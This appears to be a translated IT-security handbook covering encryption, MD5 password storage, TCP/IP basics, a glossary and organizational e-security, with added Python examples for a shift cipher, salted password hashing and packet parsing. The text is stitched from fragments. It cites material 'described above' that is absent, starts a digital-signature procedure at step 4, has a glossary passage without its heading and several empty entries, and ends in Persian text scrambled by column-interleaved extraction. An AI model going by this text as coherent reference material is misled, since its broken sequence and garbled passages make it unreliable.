This kind of encryption is similar to symmetric encryption, with one major difference: instead of one key there are two. The key used to encrypt the message is different from the key used to decrypt the encrypted message. The first key is usually public, and everyone is allowed to know it. If you want to send someone a private message, you must use that person's public key, which the owner has made available to everyone for encryption. Decrypting the message requires that person's private key, which is different from the public key and must never be given to anyone else. It follows that if your message is sent to someone using this mechanism, nobody other than the true recipient can read it.

Note that with this method the recipient cannot be sure who sent the message, because anyone may have the recipient's public key. The sender, however, can be sure that only the owner of that public key (the key used for encryption) can decrypt and read the message, using the corresponding private key.

Public and private keys can also be used the other way round. In that case you encrypt the message with your private key, and anyone who has your public key can decrypt it. What this proves is that the sender of the message can be nobody but you.
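The digit encoding and the letter-shift cipher described above differ in one respect that code makes plain: decoding needs only the public table, while decryption needs the key, and a key space of 25 shifts can simply be tried in full. This is an added example, not code from the handbook; the codes 27 for the space and 28 for the full stop are read off the handbook's digit string, and the small word list used to recognise English is an assumption.

```python
"""Digit encoding versus a keyed letter shift (added example, not from the handbook)."""
import string

ALPHABET = string.ascii_uppercase
# A..Z -> 01..26 as in the text; 27 (space) and 28 (full stop) are read off
# the handbook's digit string for "Security is important."
SYMBOLS = ALPHABET + " ."
# Assumption: a tiny word list is enough to recognise English in this demo.
COMMON_WORDS = {"THE", "AND", "IS", "OF", "TO"}


def encode_digits(text):
    """Encoding: a public, keyless mapping from characters to two-digit numbers."""
    out = []
    for ch in text.upper():
        if ch not in SYMBOLS:
            raise ValueError(f"no code defined for {ch!r}")
        out.append(f"{SYMBOLS.index(ch) + 1:02d}")
    return " ".join(out)


def decode_digits(digits):
    """Reverse of encode_digits; needs no secret, only the table."""
    chars = []
    for token in digits.split():
        n = int(token)
        if not 1 <= n <= len(SYMBOLS):
            raise ValueError(f"code {token} is outside the table")
        chars.append(SYMBOLS[n - 1])
    return "".join(chars)


def shift_encrypt(text, key):
    """Shift each letter `key` places forward, wrapping Z to A; other characters pass through."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)
    return "".join(out)


def shift_decrypt(text, key):
    """Decryption uses the same key, shifting backwards."""
    return shift_encrypt(text, -key)


def try_all_keys(ciphertext):
    """Return {key: candidate plaintext} for every one of the 25 possible shifts."""
    return {k: shift_decrypt(ciphertext, k) for k in range(1, 26)}


def guess_key(ciphertext):
    """Pick the shifts whose output contains a common English word."""
    hits = []
    for key, candidate in try_all_keys(ciphertext).items():
        words = candidate.replace(".", " ").split()
        if COMMON_WORDS.intersection(words):
            hits.append(key)
    return hits


def keyspace(bits):
    """Number of distinct keys of the given length in bits."""
    return 2 ** bits


if __name__ == "__main__":
    message = "Security is important."
    print(encode_digits(message))
    secret = shift_encrypt(message, 3)          # Caesar's key from the text
    print(secret, "->", guess_key(secret))      # 25 guesses are enough
    print(f"128-bit keys: {keyspace(128):,}")
```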
One-way encryption using hashing [142]

You can think of this method as public-key encryption in a situation where nobody holds the private key. Content can therefore be encrypted but cannot be decrypted. It differs from public-key encryption in that the encrypted message usually has a fixed maximum length. One of the most widely used one-way hashing algorithms is called MD5 [143]. The output of the MD5 algorithm is always 128 bits (16 bytes). If you generate a hash code for two different messages, the probability that the two outputs are the same is close to zero.

This method, and the output code it produces, have two main uses:

In many systems, when a user chooses a word as a password, the word is encrypted with the MD5 algorithm (or a similar one) and the encrypted version is stored. The next time the user tries to log in, what is entered is encrypted again and compared with what was stored on disk; if the two are identical, the password was correct. If the user forgets the password, what is stored on disk cannot be decrypted and a new password has to be chosen. The method is used so that the original password can never be displayed in its original form.

Unfortunately, one problem remains, and it is the reason users must not choose short, simple or guessable passwords: if someone obtains a list of encrypted passwords (for example from a system that has been broken into), it is very easy to encrypt every possible simple password, compare the results with the encrypted entries held on the system, and so find the system's simple passwords.

4. Sends the message and the encrypted hash code.

5. You receive the message.

6. Using that person's public key you decrypt the hash code, which yields the original hash code.

[142] Hash
[143] Message Digest 5
[144] Digital Signature
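The password scheme described above (store a one-way hash, hash the login attempt, compare) and its weakness against pre-hashed simple passwords can be checked by an administrator with a few lines. This is an added example, not code from the handbook; the account table and guess list are constructed, and the salted PBKDF2 variant is a mitigation introduced here, not something the handbook describes.

```python
"""Password storage as described above, plus a salted variant (added example)."""
import hashlib
import hmac
import os

# Constructed sample data.
WEAK_GUESSES = ["123456", "password", "letmein"]


def md5_store(password):
    """Unsalted one-way hash, the scheme the text describes."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def md5_verify(password, stored):
    """Hash the login attempt again and compare with the stored value."""
    return hmac.compare_digest(md5_store(password), stored)


def audit_unsalted(table, guesses=WEAK_GUESSES):
    """Return accounts whose stored hash equals the hash of a common guess."""
    lookup = {md5_store(g): g for g in guesses}
    return sorted(user for user, digest in table.items() if digest in lookup)


def salted_store(password, iterations=100_000):
    """Per-user random salt and a deliberately slow hash (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, iterations, digest


def salted_verify(password, record):
    """Recompute the hash with the stored salt and compare in constant time."""
    salt, iterations, digest = record
    attempt = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(attempt, digest)


if __name__ == "__main__":
    table = {"alice": md5_store("letmein"), "bob": md5_store("letmein"),
             "carol": md5_store("c0rrect-horse-battery")}
    print(table["alice"] == table["bob"])   # same password, same digest
    print(audit_unsalted(table))            # accounts to force a reset on
    a, b = salted_store("letmein"), salted_store("letmein")
    print(a[2] != b[2], salted_verify("letmein", a))
```

With a per-user salt, two users with the same password no longer share a stored value, so one pre-hashed guess list cannot be matched against the whole table at once.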
Appendix 2

TCP/IP

The TCP/IP protocol is a set of rules that governs all messages sent across the Internet. Ordinary users do not need to know about TCP/IP in order to use the Internet, but they should know something about firewall configuration and Internet threats. A simple description of how TCP/IP works follows. If you are already familiar with these concepts you can skip this section.

Internet addressing

Every device on the Internet has an IP address. In general this address identifies the device uniquely, just as a postal address identifies your home anywhere in the world. Addresses in the current version of TCP/IP (known as IPv4) are 32-bit binary numbers, which means that the number of possible addresses is 2^32 = 4294967296. To make them easier to display and remember, the 32-bit binary numbers are divided into four 8-bit parts. Since 2^8 = 256, each 8-bit part can be a number from 0 to 255. These four numbers are usually written one after another, separated by dots. The smallest Internet address is therefore 0.0.0.0 and the largest is 255.255.255.255. An example of an IP address is 24.200.195.15. The Internet contains devices called routers [146], which keep track of the route to each IP address and know which path to choose to reach each address.

Domain Name Service [147]

Because long strings of numbers are hard to remember, many computers on the Internet are given names made of letters (called the host name [148]). One example is www.infodev.org. When you type this name into a web browser, the computer sends a message to a special service called DNS. DNS can translate the letters into a number (in this example the number is 192.86.99.121). DNS also allows a web server to be moved to a different location: the domain concerned informs DNS of the new address, so users can go on using the same host name.

IP: Internet Protocol [149]

When data is sent over the Internet it takes the form of a set of characters and symbols called a packet [150] or datagram. IP in TCP/IP stands for "Internet Protocol", and it specifies what the internal format of these packets must be. An IP packet contains several pieces of information, among them:

• the size of the packet;
• the IP address of the recipient;
• the IP address of the place the packet is sent from; and
• the type of packet.

When a packet leaves your computer it is sent to the nearest router, which in turn tries to send the packet on to the next router along the path, and this continues until the packet reaches its destination. If a problem arises or packet congestion is heavy, the packet cannot be forwarded and stops along the way. For this reason IP is called an unreliable protocol [151]. Although in theory IP is not reliable, in most cases it delivers all the packets sent to their destination.

There are various types of packets that can be sent, but here we mention only two of them: TCP and UDP.

TCP: Transmission Control Protocol [152]

TCP is the protocol used for most messages, including the web (HTTP), File Transfer Protocol (FTP) [153] and e-mail. In addition to the data being sent, TCP packets contain the following:

• a 16-bit sending port number [154];
• a 16-bit receiving port number [155];
• packet sequencing information [156]; and
• acknowledgement information [157].

Since each computer has only one IP address, the port number is used to indicate which program on the computer is sending or receiving the message. This is what makes it possible to have several web browsers open on one computer and view the requested pages in each of them. For a program to receive a TCP message, it must be waiting for messages on the correct port. There is usually a specific port for each particular application. For example, the web server port is always port 80. When you open a browser window, it picks a port for itself more or less at random (by convention, greater than 1023), and that is the port on which it must wait for messages.

Because the length of IP packets is limited, and the information transferred by applications may be far larger than that, the information has to be divided into smaller parts. Each part is sent in its own TCP packet. The sequencing information allows the receiving program to reassemble these parts in the correct order. For various reasons, however, some packets may reach the destination sooner than others, which means that packets must be able to be received out of the order in which they were sent. Moreover, since IP is by nature unreliable in theory, some packets may never reach the destination. In that case the receiving program notices a gap in the sequence of packets received and can ask for the lost packet to be sent again.

When the sender sends a TCP packet, the receiving program is expected to confirm receipt by sending back special acknowledgement information. If the acknowledgement for a packet does not come back within a specified time, the packet is sent again. Because of the packets' sequence numbers and acknowledgements, TCP is a reliable protocol [158], and when it is used, the application and the user can be confident that if a mistake or error occurs while information is being transmitted or received, the software will be made aware of it.

UDP: User Datagram Protocol [159]

UDP is a simple format used for transferring information. In addition to the data, each UDP packet carries other information, including the following:

• a 16-bit sending port number; and
• a 16-bit receiving port number.

Here too, as with TCP, the use of port numbers means that different programs can receive and send UDP streams in parallel. And as with receiving messages in TCP, the program must wait on the correct port to receive a message. UDP has no specific provision for sequencing and acknowledging packets, so this

[152] Transmission Control Protocol
[153] File Transfer Protocol
[154] Sending Port Number
[155] Receiving Port Number
[156] Sequencing Information
[157] Acknowledgement Information
[158] Reliable Protocol
[159] User Datagram Protocol
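The header fields listed in the appendix above (packet size, sending and receiving addresses, packet type, 16-bit ports, sequence and acknowledgement numbers) sit at fixed offsets, which is what a firewall or a log analyst reads. This is an added example, not code from the handbook; the packet is constructed, with the two IP addresses taken from the text and the port, sequence and payload values chosen for illustration.

```python
"""Parse the IP/TCP/UDP header fields listed above (added example)."""
import socket
import struct

PROTOCOLS = {6: "TCP", 17: "UDP"}   # IANA protocol numbers


def ip_to_int(dotted):
    """Dotted-quad IPv4 address -> the 32-bit number it stands for."""
    parts = [int(p) for p in dotted.split(".")]
    if len(parts) != 4 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError(f"not an IPv4 address: {dotted!r}")
    value = 0
    for p in parts:
        value = (value << 8) | p
    return value


def build_sample_packet(payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Constructed TCP segment from a browser port to a web server (checksums left 0)."""
    tcp = struct.pack("!HHIIHHHH", 49152, 80, 1000, 2000, (5 << 12) | 0x018, 65535, 0, 0)
    total = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", (4 << 4) | 5, 0, total, 1, 0, 64, 6, 0,
                     socket.inet_aton("24.200.195.15"),
                     socket.inet_aton("192.86.99.121"))
    return ip + tcp + payload


def parse_packet(raw):
    """Return the header fields the text names; raise ValueError on malformed input."""
    if len(raw) < 20:
        raise ValueError("shorter than a minimal IPv4 header")
    ver_ihl, _tos, total, _id, _frag, _ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    header_len = (ver_ihl & 0x0F) * 4
    if header_len < 20 or total < header_len or total > len(raw):
        raise ValueError("inconsistent length fields")
    info = {"size": total, "source": socket.inet_ntoa(src),
            "destination": socket.inet_ntoa(dst),
            "type": PROTOCOLS.get(proto, str(proto))}
    body = raw[header_len:total]
    if proto == 6:
        if len(body) < 20:
            raise ValueError("truncated TCP header")
        sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", body[:14])
        data_offset = (off_flags >> 12) * 4
        if data_offset < 20 or data_offset > len(body):
            raise ValueError("bad TCP data offset")
        info.update(sending_port=sport, receiving_port=dport, sequence=seq,
                    acknowledgement=ack, data=body[data_offset:])
    elif proto == 17:
        if len(body) < 8:
            raise ValueError("truncated UDP header")
        sport, dport, length, _ = struct.unpack("!HHHH", body[:8])
        # UDP carries ports only: no sequence or acknowledgement fields.
        info.update(sending_port=sport, receiving_port=dport, data=body[8:length])
    return info


if __name__ == "__main__":
    for field, value in parse_packet(build_sample_packet()).items():
        print(f"{field}: {value}")
```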
Appendix 3

Glossary of technical terms

Backdoor [163]

A way of bypassing the normal, secure login to a system and gaining control of a computer without its owner's permission. If a backdoor is installed on a computer connected to a network, anyone on the Internet may be able to get into the computer and take control of it without the owner's knowledge or consent.

The loss of this data can cause many problems and usually undermines the integrity and security of the program. The problem can be prevented by checking that enough memory is available before information is transferred into it.

Identity theft [167]

Identity theft occurs when someone has collected enough information about you to be able to pass themselves off as you (for example at banks, shops or government organizations).

Backup [168]

The process of copying a computer's files to other locations on the same computer, or to peripheral devices that may be independent of that computer. Backups allow you to recover data that has been lost for any reason (for example, deleted by accident, physically damaged, or stolen).

Spam [169]

Advertisements and other e-mail messages that are sent to you without your having asked for them.

Open-source software [170]

Software whose source code is available to the public and which anyone may freely correct and modify. Because the source code is accessible, people can see how the software works and change it as they wish. The authors of open-source programs usually encourage other programmers to take part in developing and extending the capabilities of these programs. Open-source programs also include free software, and many open-source programs, whether free or sold, have capabilities similar to those of proprietary software and may carry a high cost. Open-source programs are sometimes used, under special agreements and licenses and not free of charge, in parts of commercial programs.

For more information on this subject you can refer to the following sites:

http://www.fsf.org
http://www.opensource.org

Attachment [171]

An attachment is a part of an e-mail message that can be used to transfer all kinds of files, such as text and image files. All non-text files must be converted into printable form (plain text) before they can be sent. Everything stored in a computer is a combination of the digits 0 and 1. Put simply, encoding makes these zeros and ones sendable by converting them into plain text.

Username and password [172]

A username and a confidential password that identify and authenticate the user to a computer system or website.

Virus [173]

The term "virus" has a specific meaning that is discussed further in later parts. At present, virus is applied to the whole set of programs that turn up on your computer, may spread to other computers as well, and cause them serious damage.

URL

A general address for referring to a destination on the Internet. For example http://www.infodev.org/ or mailto: info@worldbank.org

Cookie

A file that is written to, or read from, the hard disk when a website is requested remotely. The website asks for the file to be written on the computer in question so that it can read it again later. For example, if a website asks you for a username, it can store this information on the disk
Daemon
HTML
… security software be restricted. At the same time, governments must also focus on data protection, because their databases hold sensitive information about individuals: personal details and medical, criminal and tax records. Unfortunately, even in the government organizations of industrialized countries data protection is in difficulty, suffering from obsolete systems, inappropriate investment and worn-out staff who lack the necessary competence in IT security. Like commercial companies and non-profit institutions, government must also care about the public image it is left with once an intrusion or other security incident reaches the news and the media.

Small and medium-sized organizations: engines of growth and progress

In its recent report on the state of information technology in developing countries, UNDP [6] outlined some of the challenges that individuals and organizations face in the information age. [7] The World Bank has prepared several series of reports on the development and deployment of information technology. [8] Although the technical experience of organizations in the industrialized world differs in some respects (scale, costs and the knowledge base of staff), many lessons can be drawn from their strengths and weaknesses in IT security. Large institutions are fewer in number, and each has particular capabilities and greater financial resources. Even so, tensions still exist between chief security officers, as those in charge of cost centers, chief financial officers, as the controllers of spending, and other branches of the organization (chief information officers, sales and marketing, and products). [9]

Without an overall plan for creating a secure IT environment, each department may develop its own security solution, one that stems from that department's missions, goals and operational objectives and that, however well it suits one department, may be of little use to the others. These differing solutions can leave security over-provided in some areas and under-provided in others, whereas oversight by senior management ensures that security practices are arranged so that the organization as a whole performs better. The policies and technical implementations needed to set up an effective security system for the organization form an essential and fundamental part of its business objectives, and every organization must give them their due.

Small and medium-sized organizations have fewer resources to start up with, a flatter management structure, and greater reliance on the knowledge base of their staff. In these organizations, business processes may be more transparent than in large organizations, and so, in a structure where this much company information is accessible to every employee, inherent security risks will exist. In organizations that pay no particular attention to technology, the organization may be vulnerable to an employee or consultant who is technically stronger than the company's managers. In a company working at the leading edge of technology, there is a risk that ownership of its innovations and vital resources is not adequately protected against theft or sabotage.

To deal with these problems, every small and medium-sized organization must carry out a full review of its missions, objectives, competencies and information systems. If they operate in fields that may create security risks for others, for example the field of emerging technologies, they must anticipate the likely threats to their customers' security and draw up plans to reduce their impact. If they work in fields that relate in any way to government security, such as the supply of telecommunications products and services, they must be aware of when and how legal responsibility for complying with government regulations falls on them. An Internet service provider (ISP) [10] is an example of a company that faces both kinds of risk. Connecting a customer to the Internet creates security risks for the customer's data and equipment, and by supplying digital content and communication tools the ISP becomes subject to national rules and regulations. If e-commerce capability is added to these services as well, potential threats and the assurance of compliance with obligations turn into very large and fundamental problems.

The dangers of blended threats

Statistical data from several reliable sources show a rising trend in the use of malicious programs for criminal purposes. In 2002, numerous reports concerned subjects such as identity theft by means of malicious programs, defacement of websites for political motives, distributed denial-of-service (DDoS) [11] attacks against selected organizational targets, and other similar cases.

In addition, the spread of blended threats [12] on the Internet creates serious risks for everyone. These risks do not belong to any particular domain; they threaten the entire global network. The Klez worm, for example, was written with characteristics that lead experts to believe it was written either in China or in Hong Kong. Asian countries are now making increasing use of Internet-connected computers. Unfortunately, many of these computers are unprotected, and their users are unaware of the basic principles of safe computer use. As a result, regions with high technical growth, such as China, are likely to come under attack from attackers all over the world through the spread of viruses, worms, Trojans and blended threats that combine all of these.

Current software tools provide a range of protections against malicious programs, but they cannot defend completely against every form of attack. A multi-layered defense plan, in both its technical and its human aspects, sharply reduces the risk of security incidents caused by malicious programs, although it still does not eliminate it. Blended threats such as Code Red, Slammer, Klez and Bugbear can harass computer networks. Many worms have no permanent destructive effects in themselves, but they install traps in the system that give people who know about those traps quick and easy access to the network.

Apart from this, worms are in some respects more effective at disabling systems, because they are able to exploit vulnerabilities in widely used software such as web browsers.

In computing environments with these characteristics, users must improve their knowledge of the existing risks and of how to respond appropriately in individual situations. When safe computer use is practiced, the risk of an attack can be reduced considerably, but it must be stressed again that it can never be brought down to zero. Because the threat of deliberate sabotage of computer systems is very high for organizations, it is very important to examine the risks to personal security and financial transactions and the new challenges arising on wireless computing platforms.
2. the ability to access large volumes of information at high speed and low cost is strengthened;

3. a means is provided for developing data-retention and management capabilities, which leads to better maintenance of data items for financial managers, better analysis of customer behavior for marketing and sales managers, and more accurate statistics for production-line managers.

As we have seen, however, these improvements are not without risk, and this holds both for physical assets and for assets that are less visible. This part examines the IT security concerns that large and small companies, in developed and developing countries, encounter. Its various sections have been designed with particular attention to what executive departments, managers and staff must do to protect systems, customers, vendors and other stakeholders in the company. The checklists [13] and procedural notes [14] can readily be used by a government or non-profit organization.

In addition to internal procedures and policies, some small and medium-sized organizations may decide that meeting the needs of

Whether these systems are procured inside the organization or outside it, for most companies developing and supporting security infrastructure, policies and procedures will amount to nothing other than striking a balance between constraints. Executives, managers and policy-makers must take the risks seriously and, by defining formal objectives and the organization's minimum growth, set a benchmark and standard for balancing investment in security.

Once the organization has reached a satisfactory level of security, management must not forget the importance of keeping systems up to date and of regular audits of the security plan. Changes to computers and network equipment, for example of the kind specific to open-source software packages [17], call for a full review of the detailed security plan. In short, security is more an art than a science, and to guarantee that it works successfully in organizations

[13] Checklist
[14] Procedural Notes
[15] Information System Audit and Control Association (ISACA)
[16] To learn about this association's future programs, visit its site at the following address: http://www.isaca.org
This study made Uruguay a country of interest for readers of this book to study (1): http://www.isaca.org/ct_case.htm
COBIT (http://www.isaca.org/cobit.htm) has provided a framework of suitable electronic-security resources for use by managers, users, information security audit, control, and security professionals. Getting in touch with ISACA gives you a good view of the association's current and future activities.
[17] Open Source Software Packages
Chapter Two

An overview of methods for mitigating electronic security risks [19]

Overview

This chapter identifies, defines and discusses a set of policies and procedures built on eight pillars, together with an overall infrastructure for strengthening a secure electronic environment for

… is in contact with the new, since the potential benefits of global markets matter greatly to international communities, and the best use cannot be made of these markets unless security is ensured in the electronic environment. In any case, the direction of the global economy calls for a deep discussion of modern commerce and policy-making: how should privacy [22] be defined and protected? What do assurance and trust mean in a digital environment? How can an appropriate level of security be determined? And finally, how should the return on investment (ROI) [23] of security spending be measured?

Because technology is by nature constantly changing, this book not only does not go into the details of all these subjects, but for some of them does not offer even general answers. Instead, a quick review of what has happened so far in the world of security,

[19] This chapter was written with the help of a report prepared for the World Bank in 2002 by Thomas Glaessner, Tom Kellerman and Valerie McNevin: "Electronic Security: Risk Mitigation in Financial Transactions.": http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Publications
[20] E-Finance
[21] For more information, see the work of Glaessner, Kellerman and McNevin, including the following book: "Electronic Safety and Soundness: Securing Finance in a Digital Age, Public Policy Issues" (October 2003). This treatise is the culmination of efforts made over the past three years, which have resulted in several papers. Some of the other papers in this group are: “Electronic Security: Risk Mitigation in Financial Transactions” (May 2002, June 2002, July 2002), “Electronic Finance: A New Approach to Financial Sector Development?” (2002), “Mobile Risk Management: E-Finance in the Wireless Environment” (May 2002), all of which are available at the following address: http://www.worldbank1.org/finance
[22] Privacy
[23] Return on Investment
ﻫﻤﺎﻥ ﺗﻌﺪﺍﺩ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺩﺭ ﺗﻨﻬﺎ ﭼﻨـﺪ ﺛﺎﻧﻴـﻪ ﺑـﻪ ﺳـﺮﻗﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺧﻠـﻲ
ﺑﺒﺮﺩ. ﻭ ﺧﺎﺭﺟﻲ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺑﺎﺷﺪ .ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﺑﺎﻳﺪ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﺍﺭﺯﺵ ﺁﻥ ﻓﻌﺎﻟﻴﺖ ﺑﺎﺷﺪ؛
ﺑﺮ ﺍﺳﺎﺱ ﺑﺮﺭﺳﻴﻬﺎﻱ ﺍﺧﻴﺮ ﺗﺨﻤـﻴﻦ ﺯﺩﻩ ﻣـﻲﺷـﻮﺩ ﻛـﻪ %۵۷ﺍﺯ
ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴــﺖ ﺑــﺮﺍﻱ ﺗﺮﺍﻛﻨــﺸﻬﺎ ﻭ ﻣﻌــﺎﻣﻼﺕ ﻣﻬــﻢ ﺑﺎﻳــﺪ ﺩﺭ
ﺣﻤﻼﺕ ﻧﻔﻮﺫ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﻣـﺎﻟﻲ
ﺳﻄﺤﻲ ﺑﺎﻻﺗﺮ ﺍﺯ ﺗﺮﺍﻛﻨﺸﻬﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﻋﺎﺩﻱ ﺗﺄﻣﻴﻦ ﺷﻮﺩ.
ﺷﺮﻭﻉ ﺷﺪﻩ ﺑﻮﺩﻧﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺨﻠﻔﺎﺕ ﻧﻈﻴﺮ ﻳـﻚ ﻣـﻮﺭﺩ ﺟـﺪﻱ
ﻛﻪ ﺩﺭ ﻭﺯﺍﺭﺕ ﺧﺰﺍﻧـﻪﺩﺍﺭﻱ ﺁﻣﺮﻳﻜـﺎ ﺭﺥ ﺩﺍﺩ ﻧﺎﺷـﻲ ﺍﺯ ﺍﺷـﺘﺒﺎﻩ ﺩﺭ
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻳﻚ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪﻱ ﻧﻴﺰ
ﭘﻴــﺎﺩﻩﺳــﺎﺯﻱ ﺭﻭﻧــﺪﻫﺎﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﻣﺨــﺎﻃﺮﻩ ﻭ ﺑﻜــﺎﺭﮔﻴﺮﻱ
ﺑﻮﺟــﻮﺩ ﻣــﻲﺁﻭﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻳﻬــﺎ ﻫــﺮ ﺭﻭﺯ ﮔــﺴﺘﺮﺩﻩﺗــﺮ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺁﻣـﺎﺩﻩ ﺑـﺪﻭﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ
ﻣﻲﺷﻮﻧﺪ ،ﻟﺬﺍ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷﺎﻳـﺴﺘﺔ ﺗﻮﺟـﻪ
ﭼﻨﺪﻻﻳــﺔ ﺍﻣﻨﻴﺘــﻲ -ﻣــﻮﺍﺭﺩﻱ ﭼــﻮﻥ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻛﺎﺭﻛﻨــﺎﻥ،
ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣـﻨﻈﻢ ﺍﺑـﺰﺍﺭ ﻓﻨـﻲ ﻣـﻮﺭﺩ
ﺑﻴﺸﺘﺮﻱ ﺍﺳﺖ.
ﺍﺳﺘﻔﺎﺩﻩ ﻣﺎﻧﻨﺪ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ٢٨ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ - ٢٩ﺑﻮﺩﻧـﺪ. ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺑﻜـﺎﺭ ﺑـﺮﺩﻥ ﻭﺳـﺎﻳﻞ
ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺍﺧﺒﺎﺭ ﺁﻥ ﺑﻪ ﺭﺳﺎﻧﻪﻫﺎ ﻧﻴﺰ ﺭﺍﻩ ﭘﻴﺪﺍ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ،ﺍﻧﺘﻘـﺎﻝ ﻋﻼﺋـﻢ ﻭ ﺍﺳـﻨﺎﺩ
ﻛﺮﺩ ﻃﻴﻔﻲ ﺷﺪ ﻛﻪ ﻳﻜﺴﻮﻱ ﺁﻥ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻭ ﺍﻋﺘﺒـﺎﺭ ﺍﻋﺘﺒﺎﺭﻱ ،ﻭ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺩﺭ ﻳﻚ ﻣﺤـﻴﻂ ﺗﺠـﺎﺭﻱ .ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﻭ ﺳﻮﻱ ﺩﻳﮕﺮ ﺁﻥ ﺗﻐﻴﻴﺮ ﺭﻓﺘﺎﺭ ﻧﻬﺎﻥ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﺟﺰﺀ ﭘﺎﻳﻪﺍﻱ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ:
ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻮﺩ؛ ﻭ ﺍﻳﻦ ﻫﻤﻪ ﺩﻟﻴﻠﻲ ﻧﺪﺍﺷﺖ ﺟﺰ ﻋـﺪﻡ
ﺍﻋﺘﻤﺎﺩ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﻭﺍﺳـﻄﻪﻫـﺎﻱ ﺗﺠـﺎﺭﺕ ﻭ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )٢٤(EFTs؛ •
ﺳﻴﺎﺳﺘﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﻮﺟـﻪ ﺧﺎﺻـﻲ ﺑـﻪ ﺍﻳـﻦ ﺗـﻮﺍﺯﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ،ﺧـﺪﻣﺎﺕ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺑﻮﺳـﻴﻠﺔ
ﺩﺍﺷﺖ. ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﻧﺸﺎﻧﻬﺎ ،ﻛﻠﻴـﺪﻫﺎ ﻭ ﻳـﺎ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺯﻳـﺴﺘﻲ؛ ﻛـﻪ
ﻫﻤﮕــﻲ ﻫﻮﻳــﺖ ﮔﺮﻭﻫﻬــﺎ ﻳــﺎ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﺗــﺼﺪﻳﻖ
